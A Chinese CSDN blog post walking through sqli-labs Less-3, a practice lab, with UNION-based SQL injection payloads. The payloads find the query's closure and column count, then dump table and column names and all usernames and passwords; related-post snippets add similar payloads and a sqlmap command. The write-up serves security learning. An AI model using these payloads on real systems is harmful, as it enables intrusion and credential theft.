[网络安全]sqli-labs Less-3 解题详析

已于 2024-07-30 18:24:51 修改
阅读量1.8k 收藏 1
点赞数 1
分类专栏: # Sqli-Labs靶场攻防实战 文章标签: web安全 数据库 sql 网络安全
于 2023-05-01 20:50:35 首次发布
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/130458445
版权

[网络安全]Less-3 GET - Error based - Single quotes with twist - String:基于错误的GET单引号扭曲字符型注入

判断注入类型

GET1' and '1'='1,回显如下:
在这里插入图片描述GET1' and '1'='2
在这里插入图片描述没有回显,说明该漏洞类型为GET型单引号字符型注入

判断注入点个数

GET1' order by 2 --+,回显如下:
在这里插入图片描述
由上图可知,sql语法中给$id加上了()
猜测后端语句为SELECT * FROM xx where id=(‘$id’)
故构造GET1') order by 3 --+,此时后端语句为SELECT * FROM xx where id=('1') order by 3 --+')
SELECT * FROM xx where id=('-1') order by 3
GET1') order by 4 --+
在这里插入图片描述

GET1') order by 3 --+
在这里插入图片描述故注入点为3个

查库名

GET-1') union select 1,2,database(); --+
回显库名security
在这里插入图片描述

查表名

-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --+

回显四个表名
在这里插入图片描述

查users表的列名

-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'; --+

在这里插入图片描述

查字段

-1') union select 1,group_concat(username),group_concat(password) from security.users; --+

在这里插入图片描述

总结

以上为[网络安全]sqli-labs Less-3 解题详析,后续将分享[网络安全]sqli-labs Less-4 解题详析
原理及姿势可参考:[网络安全]SQL注入原理及常见攻击方法简析
我是秋说,我们下次见。

秋说
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL练习(less-3)字符型注入& union联合查询
AmyBaby00的博客
08-27 444
http://127.0.0.1/sqli/Less-3/?id=1 输入?Id=1’后报错 根据报错信息“1”) 去掉前后两个单引号,和自己输入的一个单引号后还有两个单引号和一个括号,可推出sql注入中的由单引号和括号的闭合模式。 order by 3 查看显示位 (3)并不是固定的,要去试的 union select 查询显示位 联合查询语句:Union select 1,databas...
sql-libs——less3
bronze_s的博客
10-12 154
http://192.168.0.5:9002/Less-3/?id=5%27)%20order%20by%203%20–+ http://192.168.0.5:9002/Less-3/?id=-5%27)%20union%20select%201,2,3%20–+ http://192.168.0.5:9002/Less-3/?id=-5%27)%20union%20select%201,version(),database()%20–+ http://192.168.0.5:9002/Less-
SQL注入之sqlilabs:less-1
Dmajorcanon的博客
02-21 3739
sqlilabs个人练习及解题思路√
sql注入less3
Mdcq123的博客
10-15 328
?id=1’) order by 3%23 http://192.168.197.146/sqli-labs/sqli-labs/Less-3/?id=-1’) union select 1,database(),3%23 http://192.168.197.146/sqli-labs/sqli-labs/Less-3/?id=-1’) union select 1,(select group_...
sqli-labs—————Less-3
Fly_鹏程万里
05-08 1687
Less-3根据提示传入参数id,数据类型为numeric老样子,用单引号测试报错的内容为:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,篡改数据库查询,从而获取、修改、删除敏感数据或控制整个数据库系统。常见的防范措施包括: 1. **参数化查询/预编译语句**:使用预编译语句可以...
sql-libs less3 答案详解
小白巨白的博客
01-17 554
1、首先对sql的注入语句类型,进行判断,发现当输入数值时,不发生报错,当有单引号时,有错误进行。 sql语句的猜测: select * from 。。 where id=(‘’) 当自己添加‘)进行闭合时,发现整体式子依然成立 说明自己的sql 语句的大致含义正确 2、判断对应的注入点的个数 http://127.0.0.1/Less-3/?id=2’) order by 1、2、3–+ 当出现4的时候,发现错误,所以对应的列数共有3列 3、查找对应的注入点的位置 http://127.0.0.1/Les
初学SQLi-LABS过关分享Less-3
SenTouKiReI的博客
06-10 775
初学sql注入SQLi-LABS过关分享Less-3
网络安全-sqlmap实战之sqlilabs-Less3
关注网络安全、云原生安全
06-26 2010
类型 字符串转换错误,他又提示输入数字型ID,应该是把数字转换为了字符串 注入判断 截图 结合课程1,猜测sql语句为 select * from users where id = ('参数') LIMIT 0,1 -dbs枚举数据库 python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" -dbs 4种注入方式 枚举数据库 -tables枚举表 python sqlmap.py -u "192...
SQL注入漏洞学习之二:SQLI-LABS闯关之Less-3和Less-4
m0_71839248的博客
06-10 731
SQLI-LABS闯关之Less-3和Less-4
Sqli-Labs靶场(1--5)题详解
weixin_46099095的博客
03-10 4639
目录 一.Less-1:GET - Error based - Single quotes -String(GET - 基于错误 - 单引号 - 字符串) 一、判断注入点 二、确认列数 三、使用Union select 进行查询 四、爆破所有数据库名以及当前数据库名 五、爆破security数据库内的所有表名 六、爆破users表内的所有列名 七、查询所有的用户名,密码 二.Less-2:GET - Error based - Intiger based(GET - 基于错误 -..
SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2242
sqli第三关简要步骤
Sqli-Labs之less-3
ISNS的博客
02-05 1096
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 目前看来,这几关都是基于less-1的思路,所以详细过程参见: Sqli-Labs之less-1 less-3的主要的变化还是在于注入点的判断: 后续的操作就一样了: ...
LESS-3和LESS-4(sql注入)
qq_44598397的博客
03-14 1584
LESS-3 源码: 1、输入?Id=1’后出现错误 错误提示为”2”)LIMIT 0,1’.去掉前后两个单引号,和自己输入的一个单引号后还有两个单引号和一个括号,可推出sql注入中的由单引号和括号和起来的闭合模式。 2、输入:http://127.0.0.1/sqlilabs/Less-3/?id=2’)–+ url编码后:http://127.0.0.1/sqlilabs/Less-3/?...
Gartner发布2024年网络风险管理成熟度曲线:使网络安全战略与业务目标保持一致的概念、方法、流程和技术
最新发布
lurenjia404的博客
08-07 735
网络风险管理现在是高管和监管机构最关注的问题,它采用多种方法和技术来支持治理、风险管理和合规性。安全和风险管理领导者可以使用此技术成熟度曲线来评估解决方案并做出适当的采用决策。
sqli-labs less
07-28
- *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值